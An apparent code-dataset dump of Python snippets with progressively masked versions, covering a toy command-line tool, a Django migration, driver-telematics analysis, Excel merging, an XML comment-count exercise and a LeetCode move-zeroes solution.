code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from time import sleep
import sys
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while (keepgoing):
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(" ")]
command = words[0].lower()
arguments = words[1:]
if (command == ''):
continue
if (command not in available_commands):
print(f"-> {command} is an invalid command. Available commands:", available_commands)
continue
if (command == 'help'):
print('-> Try out the following commands', available_commands)
if (command == 'echo'):
print(f'-> {" ".join(arguments)}')
if (command == 'pbar'):
for i in range(21):
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("[%-20s] %d%%" % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if (command == 'joke'):
import requests
joke = requests.get("https://official-joke-api.appspot.com/random_joke").json()
print(f"-> {joke['setup']}")
input("-> (press enter)")
print(f"-> {joke['punchline']}")
if (command == 'quit'):
keepgoing = False
else:
print("exiting..")
if __name__ == "__main__":
cmdline()
|
normal
|
{
"blob_id": "a028661f9bcaa6dfe5389cb57f31b07d7e981487",
"index": 9890,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-4": "from time import sleep\nimport sys\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-5": "from time import sleep\nimport sys\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while (keepgoing):\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(\" \")]\n command = words[0].lower()\n arguments = words[1:]\n\n if (command == ''):\n continue\n if (command not in available_commands):\n print(f\"-> {command} is an invalid command. Available commands:\", available_commands)\n continue\n\n if (command == 'help'):\n print('-> Try out the following commands', available_commands)\n if (command == 'echo'):\n print(f'-> {\" \".join(arguments)}')\n if (command == 'pbar'):\n for i in range(21):\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%%\" % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n\n if (command == 'joke'):\n import requests\n joke = requests.get(\"https://official-joke-api.appspot.com/random_joke\").json()\n print(f\"-> {joke['setup']}\")\n input(\"-> (press enter)\")\n print(f\"-> {joke['punchline']}\")\n\n if (command == 'quit'):\n keepgoing = False\n\n\n else:\n print(\"exiting..\")\n\n\nif __name__ == \"__main__\":\n cmdline()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('orders', '0001_initial')]
operations = [migrations.RenameField(model_name='orderproduct',
old_name='products', new_name='product')]
<|reserved_special_token_1|>
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [('orders', '0001_initial')]
operations = [migrations.RenameField(model_name='orderproduct',
old_name='products', new_name='product')]
<|reserved_special_token_1|>
# Generated by Django 3.1 on 2020-09-09 15:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('orders', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='orderproduct',
old_name='products',
new_name='product',
),
]
|
flexible
|
{
"blob_id": "0e73153d004137d374637abf70faffabf0bab1fb",
"index": 9762,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('orders', '0001_initial')]\n operations = [migrations.RenameField(model_name='orderproduct',\n old_name='products', new_name='product')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('orders', '0001_initial')]\n operations = [migrations.RenameField(model_name='orderproduct',\n old_name='products', new_name='product')]\n",
"step-5": "# Generated by Django 3.1 on 2020-09-09 15:58\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('orders', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='orderproduct',\n old_name='products',\n new_name='product',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pylab import *
import pandas as pd
from matplotlib import pyplot
import pylab
from mpl_toolkits.mplot3d import Axes3D
from threading import Thread
from threading import Semaphore
from threading import Lock
from Queue import Queue
sam = Semaphore(1)
lck = Lock()
q=Queue(10)
def myFunc(z):
#if z%2==0 and z>1:
max_dist=[]
cumm_dist=[]
endpt_dist=[]
passible=True
for i in range(1,201):
try:
vecs=pd.read_csv("/Users/vmac/Downloads/drivers/"+str(z)+"/"+str(i)+".csv")
#print "proceed"
#ax.plot(vecs['x'], vecs['y'], color=colors[i%6], lw=1)
max_dist.append(0.0)
cumm_dist.append(0.0)
endpt_dist.append(sqrt(vecs['y'][len(vecs)-1]*vecs['y'][len(vecs)-1]+vecs['x'][len(vecs)-1]*vecs['x'][len(vecs)-1]))
for j in range(0,len(vecs)):
local_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])
if j==0:
incr_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])
else:
incr_dist=sqrt((vecs['y'][j]-vecs['y'][j-1])*(vecs['y'][j]-vecs['y'][j-1])+(vecs['x'][j]-vecs['x'][j-1])*(vecs['x'][j]-vecs['x'][j-1]))
if max_dist[i-1]<local_dist:
max_dist[i-1]=local_dist
cumm_dist[i-1]+=incr_dist
except Exception, e:
passible=False
print e
if passible==True:
#prob_vals = hist(max_dist, bins=10,cumulative=True,normed=True)
mean_max_dist=mean(max_dist)
std_max_dist=std(max_dist)
#print std_max_dist
max_dist=(max_dist-mean_max_dist)/std_max_dist
mean_cumm_dist=mean(cumm_dist)
std_cumm_dist=std(cumm_dist)
cumm_dist=(cumm_dist-mean_cumm_dist)/std_cumm_dist
mean_endpt_dist=mean(endpt_dist)
std_endpt_dist=std(endpt_dist)
endpt_dist=(endpt_dist-mean_endpt_dist)/std_endpt_dist
the_norms=np.sqrt(np.square(max_dist)+np.square(cumm_dist)+np.square(endpt_dist))
#mean_norms=mean(the_norms)
#median_norms=median(the_norms)
#print mean(the_norms),median(the_norms)
#fig = plt.figure()
#ax = Axes3D(fig)
#plt.hist(the_norms)
#ax.scatter(max_dist, cumm_dist, endpt_dist)
#plt.show()
prob_vals=hist(the_norms, bins=10, cumulative=True,normed=True)
#print max_dist
#exit(0)
#print prob_vals[0], prob_vals[1]
#approach 1: calculate max distance from origin for each path, use histogram to check for anomalies gap
#approach 2: calculate max_dist, cumulative dist, and endpoint distance,make z score,
# use histogram to check for anomalies gap
threshold1=0
threshold2=0
for i in range(0,len(prob_vals[0])-1):
#print prob_vals[0][i+1]-prob_vals[0][i]
if prob_vals[0][i+1]-prob_vals[0][i]< 0.1:
if threshold1==0:
threshold1=prob_vals[1][i+1]
threshold2=prob_vals[1][i+1]
else:
threshold2=prob_vals[1][i+1]
if z%1==0:
bin_classes=[]
for i in range(0,len(max_dist)):
if the_norms[i]>=threshold1 and the_norms[i]<=threshold2:
bin_classes.append({'driver_trip':str(z)+"_"+str(i+1),'prob':0})
else:
bin_classes.append({'driver_trip':str(z)+"_"+str(i+1),'prob':1})
#print bin_classes
#print "success?"
outpt=pd.DataFrame(data=bin_classes)
#print "success2 "
if z==1:
outpt.to_csv(path_or_buf="/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv", index=False)
else:
q.put(outpt)
#print "queue size ",q.qsize()
#with open("/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv",'a') as f:
#outpt.to_csv(f,header=False, index=False)
#f.close()
print "success ",z
#sam.release()
def worker():
while True:
item = q.get()
item.to_csv(f, header=False, index=False)
q.task_done()
#print "queue size ",q.qsize()
bin_classes=[]
f=[]
for z in range(2762,3613):#up to 3613
#print "iteration ",z
if z == 168:
myFunc(z)
f = open("/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv",'a')
t=Thread(target=worker)
t.daemon=True
t.start()
else:
myFunc(z)
#sam.acquire()
#t=Thread(target=myFunc,args=(z,))
#t.start()
|
normal
|
{
"blob_id": "33c0efb47e3253442b6a808c7ebffac275c19321",
"index": 7763,
"step-1": "from pylab import *\nimport pandas as pd\nfrom matplotlib import pyplot\nimport pylab\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom threading import Thread\nfrom threading import Semaphore\nfrom threading import Lock\nfrom Queue import Queue\nsam = Semaphore(1)\n\nlck = Lock()\nq=Queue(10)\n\ndef myFunc(z):\n #if z%2==0 and z>1:\n max_dist=[]\n cumm_dist=[]\n endpt_dist=[]\n passible=True\n for i in range(1,201):\n try:\n vecs=pd.read_csv(\"/Users/vmac/Downloads/drivers/\"+str(z)+\"/\"+str(i)+\".csv\")\n #print \"proceed\"\n #ax.plot(vecs['x'], vecs['y'], color=colors[i%6], lw=1)\n max_dist.append(0.0)\n cumm_dist.append(0.0)\n endpt_dist.append(sqrt(vecs['y'][len(vecs)-1]*vecs['y'][len(vecs)-1]+vecs['x'][len(vecs)-1]*vecs['x'][len(vecs)-1]))\n for j in range(0,len(vecs)):\n local_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])\n if j==0:\n incr_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])\n else:\n incr_dist=sqrt((vecs['y'][j]-vecs['y'][j-1])*(vecs['y'][j]-vecs['y'][j-1])+(vecs['x'][j]-vecs['x'][j-1])*(vecs['x'][j]-vecs['x'][j-1]))\n if max_dist[i-1]<local_dist:\n max_dist[i-1]=local_dist\n cumm_dist[i-1]+=incr_dist\n except Exception, e:\n passible=False\n print e\n\n if passible==True:\n #prob_vals = hist(max_dist, bins=10,cumulative=True,normed=True)\n mean_max_dist=mean(max_dist)\n std_max_dist=std(max_dist)\n #print std_max_dist\n max_dist=(max_dist-mean_max_dist)/std_max_dist\n mean_cumm_dist=mean(cumm_dist)\n std_cumm_dist=std(cumm_dist)\n cumm_dist=(cumm_dist-mean_cumm_dist)/std_cumm_dist\n mean_endpt_dist=mean(endpt_dist)\n std_endpt_dist=std(endpt_dist)\n endpt_dist=(endpt_dist-mean_endpt_dist)/std_endpt_dist\n\n the_norms=np.sqrt(np.square(max_dist)+np.square(cumm_dist)+np.square(endpt_dist))\n #mean_norms=mean(the_norms)\n #median_norms=median(the_norms)\n #print mean(the_norms),median(the_norms)\n #fig = plt.figure()\n #ax = Axes3D(fig)\n #plt.hist(the_norms)\n #ax.scatter(max_dist, cumm_dist, endpt_dist)\n #plt.show()\n prob_vals=hist(the_norms, bins=10, cumulative=True,normed=True)\n\n #print max_dist\n #exit(0)\n #print prob_vals[0], prob_vals[1]\n\n #approach 1: calculate max distance from origin for each path, use histogram to check for anomalies gap\n #approach 2: calculate max_dist, cumulative dist, and endpoint distance,make z score,\n # use histogram to check for anomalies gap\n threshold1=0\n threshold2=0\n for i in range(0,len(prob_vals[0])-1):\n #print prob_vals[0][i+1]-prob_vals[0][i]\n if prob_vals[0][i+1]-prob_vals[0][i]< 0.1:\n if threshold1==0:\n threshold1=prob_vals[1][i+1]\n threshold2=prob_vals[1][i+1]\n else:\n threshold2=prob_vals[1][i+1]\n\n if z%1==0:\n bin_classes=[]\n for i in range(0,len(max_dist)):\n if the_norms[i]>=threshold1 and the_norms[i]<=threshold2:\n bin_classes.append({'driver_trip':str(z)+\"_\"+str(i+1),'prob':0})\n else:\n bin_classes.append({'driver_trip':str(z)+\"_\"+str(i+1),'prob':1})\n #print bin_classes\n #print \"success?\"\n outpt=pd.DataFrame(data=bin_classes)\n #print \"success2 \"\n if z==1:\n outpt.to_csv(path_or_buf=\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\", index=False)\n else:\n q.put(outpt)\n #print \"queue size \",q.qsize()\n #with open(\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\",'a') as f:\n #outpt.to_csv(f,header=False, index=False)\n #f.close()\n\n print \"success \",z\n #sam.release()\n\ndef worker():\n while True:\n item = q.get()\n item.to_csv(f, header=False, index=False)\n q.task_done()\n #print \"queue size \",q.qsize()\n\nbin_classes=[]\nf=[]\n\nfor z in range(2762,3613):#up to 3613\n #print \"iteration \",z\n if z == 168:\n myFunc(z)\n f = open(\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\",'a')\n t=Thread(target=worker)\n t.daemon=True\n t.start()\n else:\n myFunc(z)\n #sam.acquire()\n #t=Thread(target=myFunc,args=(z,))\n #t.start()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
import os
import time
import pandas as pd
file_dir = os.getcwd() # 获取当前工作目录
file_list_all = os.listdir(file_dir) # 获取目录下的所有文件名
file_list_excel = [item for item in file_list_all if ('.xlsx' in item) or ('.xls' in item)] # 清洗非excel文件
new_list = [] # 空列表用于存放下面各个清洗后的表格
for file in file_list_excel:
'''遍历所有excel文件,删除空行'''
file_path = os.path.join(file_dir, file) # 连接而成当前文件的完整路径
df = pd.read_excel(file_path) # 读取当前excel文件
data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any') # 对空行进行删除
new_list.append(data) # 删除空行后存入列表
df_all = pd.concat(new_list) # 将所有删除空行的表格进行合并
df_all.to_excel('new_file.xlsx', index=False) # 将合并后的数据存到文件中
print('Ok, 3秒后退出。')
time.sleep(3)
|
normal
|
{
"blob_id": "ea646068d48a9a4b5a578a5fb1399d83a4812b02",
"index": 1134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\n<mask token>\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-3": "<mask token>\nfile_dir = os.getcwd()\nfile_list_all = os.listdir(file_dir)\nfile_list_excel = [item for item in file_list_all if '.xlsx' in item or \n '.xls' in item]\nnew_list = []\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\ndf_all = pd.concat(new_list)\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-4": "import os\nimport time\nimport pandas as pd\nfile_dir = os.getcwd()\nfile_list_all = os.listdir(file_dir)\nfile_list_excel = [item for item in file_list_all if '.xlsx' in item or \n '.xls' in item]\nnew_list = []\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\ndf_all = pd.concat(new_list)\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport os\nimport time\nimport pandas as pd\n\nfile_dir = os.getcwd() # 获取当前工作目录\nfile_list_all = os.listdir(file_dir) # 获取目录下的所有文件名\nfile_list_excel = [item for item in file_list_all if ('.xlsx' in item) or ('.xls' in item)] # 清洗非excel文件\n\nnew_list = [] # 空列表用于存放下面各个清洗后的表格\nfor file in file_list_excel:\n '''遍历所有excel文件,删除空行'''\n file_path = os.path.join(file_dir, file) # 连接而成当前文件的完整路径\n df = pd.read_excel(file_path) # 读取当前excel文件\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any') # 对空行进行删除\n new_list.append(data) # 删除空行后存入列表\n\ndf_all = pd.concat(new_list) # 将所有删除空行的表格进行合并\ndf_all.to_excel('new_file.xlsx', index=False) # 将合并后的数据存到文件中\n\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
<|reserved_special_token_0|>
print(len(xml))
<|reserved_special_token_0|>
print('Comment count:', len(lst))
<|reserved_special_token_0|>
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
# # Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'
if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
# uh = urllib.request.urlopen(url)
# data = uh.read()
# print('Retrieved', len(data), 'characters')
# print(data.decode())
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
# counts = stuff.findall('.//count')
# print(counts)
for item in lst:
# print('Name', item.find('name').text)
# print('Count', item.find('count').text)
x = int(item.find('count').text)
tot = tot + x
print(tot)
|
flexible
|
{
"blob_id": "3b8c4f19e28e54e651862ec9b88b091c9faff02b",
"index": 9525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\n<mask token>\nprint(len(xml))\n<mask token>\nprint('Comment count:', len(lst))\n<mask token>\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-3": "<mask token>\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nurl = input('Enter a URL: ')\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\ntot = 0\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-4": "import urllib.request, urllib.parse, urllib.error\nfrom urllib.request import urlopen\nimport xml.etree.ElementTree as ET\nimport ssl\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nurl = input('Enter a URL: ')\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\ntot = 0\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-5": "import urllib.request, urllib.parse, urllib.error\nfrom urllib.request import urlopen\nimport xml.etree.ElementTree as ET\nimport ssl \n\n# # Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter a URL: ')\n# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'\nif len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\n# uh = urllib.request.urlopen(url)\n# data = uh.read()\n# print('Retrieved', len(data), 'characters')\n # print(data.decode())\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\n\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\n\ntot = 0\n# counts = stuff.findall('.//count')\n# print(counts)\nfor item in lst:\n # print('Name', item.find('name').text)\n # print('Count', item.find('count').text)\n x = int(item.find('count').text)\n tot = tot + x\n \nprint(tot)\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
<|reserved_special_token_0|>
print(s.moveZeroes(nums))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
nums = [-959151711, 623836953, 209446690, -1950418142, 1339915067, -
733626417, 481171539, -2125997010, -1225423476, 1462109565, 147434687,
-1800073781, -1431212205, -450443973, 50097298, 753533734, -747189404,
-2070885638, 0, -1484353894, -340296594, -2133744570, 619639811, -
1626162038, 669689561, 0, 112220218, 502447212, -787793179, 0, -
726846372, -1611013491, 204107194, 1605165582, -566891128, 2082852116,
0, 532995238, -1502590712, 0, 2136989777, -2031153343, 371398938, -
1907397429, 342796391, 609166045, -2007448660, -1096076344, -323570318,
0, -2082980371, 2129956379, -243553361, -1549960929, 1502383415, 0, -
1394618779, 694799815, 78595689, -1439173023, -1416578800, 685225786, -
333502212, -1181308536, -380569313, 772035354, 0, -915266376, 663709718,
1443496021, -777017729, -883300731, -387828385, 1907473488, -725483724,
-972961871, -1255712537, 383120918, 1383877998, 1722751914, 0, -
1156050682, 1952527902, -560244497, 1304305692, 1173974542, -1313227247,
-201476579, -298899493, -1828496581, -1724396350, 1933643204,
1531804925, 1728655262, -955565449, 0, -69843702, -461760848, 268336768,
1446130876]
s = Solution()
print(s.moveZeroes(nums))
<|reserved_special_token_1|>
"""
MAIN IDEA --> Keep 2 pointers. i points to current 0 element and j searches for first non zero element which comes after i.
As soon as we get a j, we swap i and j. So index i now becomes non zero. Now move i to next index i.e i+1 and now check if i
is zero or non zero. If i is still zero, then again search for 1st non zero element represented by j and swap again.
If i is now non-zero then no need to swap we already have a non zero in the beginning of array, so we just move the pointer i forward
"""
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j: # j searches for the 1st non zero element after pointer i
if nums[i] == 0 and nums[j] != 0: # If element at i is zero and j != 0, swap them
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0: # If i is not zero, then just increment both i and j
i += 1
#j += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
nums = [-959151711,623836953,209446690,-1950418142,1339915067,-733626417,481171539,-2125997010,-1225423476,1462109565,147434687,-1800073781,-1431212205,-450443973,50097298,753533734,-747189404,-2070885638,0,-1484353894,-340296594,-2133744570,619639811,-1626162038,669689561,0,112220218,502447212,-787793179,0,-726846372,-1611013491,204107194,1605165582,-566891128,2082852116,0,532995238,-1502590712,0,2136989777,-2031153343,371398938,-1907397429,342796391,609166045,-2007448660,-1096076344,-323570318,0,-2082980371,2129956379,-243553361,-1549960929,1502383415,0,-1394618779,694799815,78595689,-1439173023,-1416578800,685225786,-333502212,-1181308536,-380569313,772035354,0,-915266376,663709718,1443496021,-777017729,-883300731,-387828385,1907473488,-725483724,-972961871,-1255712537,383120918,1383877998,1722751914,0,-1156050682,1952527902,-560244497,1304305692,1173974542,-1313227247,-201476579,-298899493,-1828496581,-1724396350,1933643204,1531804925,1728655262,-955565449,0,-69843702,-461760848,268336768,1446130876]
s = Solution()
print(s.moveZeroes(nums))
|
flexible
|
{
"blob_id": "8855747f58b48bedc362930662e147b1fc4ebd63",
"index": 4182,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\n<mask token>\n",
